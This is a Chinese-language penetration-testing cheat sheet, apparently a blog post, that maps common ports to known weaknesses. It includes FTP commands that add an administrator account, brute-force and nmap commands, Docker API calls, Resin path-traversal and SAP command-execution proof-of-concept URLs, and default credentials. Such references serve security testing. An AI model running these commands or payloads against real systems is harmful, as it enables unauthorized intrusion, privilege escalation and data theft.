文章目录
前言
整理记录下常见端口及漏洞,以便查找。
- 20/21/69:FTP(文件传输协议)/TFTP(小型文件传输协议)
20:数据端口;21:控制端口;69:小型文件传输协议
可以尝试匿名登录漏洞 anonymous/为空或任意邮箱(anon@ymous.tw)
后门漏洞检测:
nmap --script=vuln -p 21 ip
FTP/TFTP用户名密码暴力破解
FTP提权命令:
# 增加系统用户
Quote site exec net user 4567 4567 /add
# 提升到管理员权限
Quote site exec net localgroup administrators 4567 /add
-
22:SSH
弱口令、OpenSSH漏洞、ssh隧道及内网代理转发 -
23:Telnet远程连接服务
弱口令、嗅探抓取telnet明文账户密码。 -
25:SMTP邮件服务
弱口令、未授权、邮件伪造
通过SMTP用户枚举获取用户名:
nmap -p 25 -- smtp-enum-users.nse <target>
-
53:DNS域名系统
DNS域传送漏洞、劫持、缓存投毒
DNS域传送漏洞检测方式:nmap --script dns-zone-transfer --script-args dns-zone-transfer.domain=xxxx.com -p 53 -Pn dns.xxxx.com
nmap --script dns-zone-transfer表示加载nmap文件夹下的脚本文件dns-zone-transfer.nse,扩展名.nse可省略。
–script-args dns-zone-transfer.domain=xxxx.com向脚本传递参数,设置列出记录的域是xxxx.com
kali可通过dnsenum检测:dnsenum xxxx.com -
80/81/443:IIS服务
PUT写文件、短文件名泄露、Apache解析漏洞 -
80/8080:Apache/Tomcat/Nginx/Axis2
弱口令、解析漏洞、示例目录 -
110:POP3
弱口令 -
137/139:samba
弱口令:爆破工具可选hydra;命令:hydra -l username -p PassFile IP smb
未授权访问、远程代码执行:CVE-2015-0240 -
161:SNMP
默认团体名/弱口令访问
利用方式:通过nmap自带的审计脚本进行检测,可能导致敏感信息泄露。
弱口令检测:nmap –sU –p161 –script=snmp-brute <target>
获取系统信息:nmap –sU –p161 –script=snmp-sysdescr <target>
获取用户信息:nmap -sU -p161 --script=snmp-win32-user <target>
获取网络端口状态:nmap -sU -p161 --script=snmp-netstat <target>
-
389:ldap轻量级目录访问协议
ldap未授权可通过LDAPSoft Ldap Browser软件直接连接
弱口令和盲注 -
443:HTTPS/SSL
OpenSSL心脏滴血
扫描脚本:nmap -sV --script=ssl-heartbleed -
445:SMB
溢出漏洞 -
512/513/514:Linux rexec
rlogin远程登录 -
873:rsync
匿名未授权访问、弱口令
利用方式:攻击者可以执行下载/上传等操作,也可以尝试上传webshell。
下载:#rsync -avz a.b.c.d::path/file path/filiname
上传:#rsync -avz path/filename a.b.c.d::path/file
-
1024:jupyter
jupyter未授权 ip:1024/tree? -
1090/1099:RMI
JAVA RMI 反序列化远程命令执行漏洞
检测工具:attackRMI.jar -
1352:Lotus domino邮件服务端口
爆破:弱口令(admin password)控制台
信息泄露
跨站脚本攻击 -
1433:MsSQL
弱口令和注入
利用方式:差异备份getshell、SA账户提权等 -
1521:Oracle
弱口令 -
2049:NFS
未授权 -
2181:ZooKeeper
未授权
检测方式:攻击者可通过执行envi命令获得系统大量的敏感信息,包括系统名称、Java环境。
echo envi | nc ip port -
2375:Docker
检测方式:通过docker daemon api 执行docker命令。
#列出容器信息,效果与docker ps -a 一致。
curl http://<target>:2375/containers/json
docker -H tcp://<target>:2375 start <Container Id>
-
2601:zebra
默认密码 -
3128:squid
空口令 -
3311/3312:kangle
弱口令 -
3306:MySQL
弱口令、拒绝服务、注入、提权 -
3389:Windows远程桌面/rdp
CVE-2019-0708和弱口令,Shift粘滞键后门 -
3690:SVN服务
SVN泄漏、未授权访问漏洞 -
4100:SYSBase
弱口令 -
4430:锐捷NBR路由器
可以尝试锐捷NBR路由器命令执行 -
4440:rundeck
弱口令:admin -
4560:log4j SocketServer监听的端口
可能存在 log4j<=1.2.17反序列化漏洞(CVE-2019-17571) -
4750:BMC
可能存在 BMC服务器自动化RSCD代理远程代码执行(CVE-2016-1542) -
4848:glassfish
控制台弱口令、认证绕过 -
5000:syBase/DB2
弱口令和命令注入
CVE-2015-1922 -
5422:postgreSQL
弱口令、注入攻击 -
5432:postgresql
缓冲区溢出、弱口令、注入攻击 -
5632:pyanywhere
拒绝服务、代码执行
PyAnywhere服务:一款远控工具,有点类似vnc的功能,可以利用pcanywhere来进行提权。 -
5900/5901/5902:VNC
弱口令、认证口令绕过、拒绝服务攻击(CVE-2015-5239)、权限提升(CVE-2013-6886) -
5984:CouchDB
命令执行、垂直权限绕过
后台访问:http://:5984/_utils -
6082:varnish
未授权 -
6379:redis
未授权
利用方式:绝对路径写webshell 、利用计划任务执行命令反弹shell、公私钥认证获取root权限、主从复制RCE等。
检测脚本:nmap -p 6379 --script redis-info <target> -
7001:weblogic
弱口令:用户名密码均一致,system/weblogic(密码可能是weblogic123)/portaladmin/guest
Congsole后台部署war包上传webshell
java反序列化
SSRF内网探测
命令执行 -
7778:Kloxo
Kloxo主机控制面板登录 -
8000:JDWP
远程命令执行漏洞
检测工具:https://github.com/IOActive/jdwp-shellifier -
8009-ajp13:Tomcat ajp
任意文件读取(CNVD-2020-10487)。 -
8069:zabbix
Zabbix弱口令:admin/zabbix
可导致的Getshell漏洞 -
8080:Jboss
弱口令、未授权访问、反序列化、远程代码执行。
检测工具:https://github.com/joaomatosf/jexboss -
8080:GlassFish
弱口令admin/admin,直接部署shell
任意文件读取获取服务器敏感配置信息 -
8080:Resin
目录遍历、远程文件读取
任意文件读取POC:
payload1 = “/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/passwd”
payload2 = “/resin-doc/examples/jndi-appconfig/test?inputFile=…/…/…/…/…/…/…/…/…/…/etc/passwd”
payload3 = “/ …\\web-inf” -
8080/8089:Jenkins
弱口令、未授权、反序列化
利用方式:访问如下url,可以执行脚本命令,反弹shell,写入webshell等。
http://:8080/manage
http://:8080/script -
8161: ActiveMQ
弱口令、文件上传、反序列化
利用方式:默认密码admin/admin登陆控制台、写入webshell、上传ssh key等方式。 -
8443:http-alt
心脏滴血漏洞
检测方式:nmap -sV -p port --script ssl-heartbleed.nse <target> -
9000:fastcgi端口
可能存在远程命令执行漏洞 -
9043/9080/9090:WebSphere
弱口令,java反序列化、文件泄露
后台地址:https://ip:port/ibm/console/logon.jsp -
9200/9300:Elastic Search
未授权、远程代码执行
查看数据库名的操作为访问IP地http://xx.xx.xx.xx:9200/_plugin/head/
GET方式_cat/indices?v
检测方式:
直接访问如下url,获取相关敏感信息。
http://:9200/_nodes
查看节点数据
http://:9200/_river 查看数据库敏感信息 -
10000:Webmin-Web控制面板
可能存在弱口令 -
10001/10002:JmxRemoteLifecycleListener监听的
可能存在Tomcat反序列化漏洞(CVE-2016-8735) -
11211:memcache
未授权
检测方式:无需用户名密码,可以直接连接memcache 服务的11211端口。
nc -vv 11211
或nmap -p 11211 --script memcached-info <target> -
27017/27018:mongodb
未授权访问
检测方式:nmap -p 27017 --script mongodb-info <target> -
50000:SAP
远程代码执行
利用方式:攻击者通过构造url请求,实现远程代码执行。
POC:http://:50000/ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=cmd.exe /c ipconfig /all -
50070:hadoop数据库
未授权,信息泄露,命令执行 -
61616:Apache ActiveMQ服务端口
可能存在 Apache ActiveMQ任意文件写入漏洞(CVE-2016-3088) -
40000-65535可尝试向日葵RCE